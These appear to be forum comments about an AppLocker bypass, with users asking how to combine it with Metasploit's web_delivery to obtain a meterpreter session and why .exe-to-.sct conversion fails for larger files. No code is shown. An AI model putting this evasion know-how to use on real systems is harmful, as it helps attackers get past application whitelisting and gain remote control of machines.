This is a bypass for applocker, not a remote-execution exploit. You have to have basic shell access on the machine already... This just bypasses applocker restrictions on the machine, but it is still something to worry about.

How to make it work with web_delivery? I tried:

It looks like it executes, but I do not get the meterpreter session.

I have seen this in a forum where there is a builder to turn .Exe into .sct but what I do not understand is the file size. If I try with a file size of 50kb it execute but if I tried with a file with 400kb upward it won't work. Can anyone point out something right for me?
